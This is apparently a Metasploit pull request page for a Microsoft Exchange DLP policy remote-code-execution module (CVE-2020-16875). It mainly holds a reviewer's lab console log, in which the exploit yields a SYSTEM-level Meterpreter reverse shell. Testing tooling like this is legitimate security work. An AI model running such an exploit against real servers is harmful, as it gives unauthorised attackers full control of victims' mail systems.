Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875) #14126
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Tested successfully from a combined branch of 14126 + 14139
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
[*] Started reverse TCP handler on 192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.159.53/owa/
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abn Amro Hoare Govett Limited Data
[*] Powershell command length: 2092
[*] Sending stage (200262 bytes) to 192.168.159.53
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.53:6911) at 2020-09-16 12:32:55 -0400
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-GD5KVDKUNIP
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : EXCHG
Logged On Users : 11
Meterpreter : x64/windows
meterpreter >
Retested this just now with the latest changes that addressed my comments and everything is still working so I'm going to go ahead and get this landed momentarily.
Release Notes
New module
Requires #14139!
Info
Exploit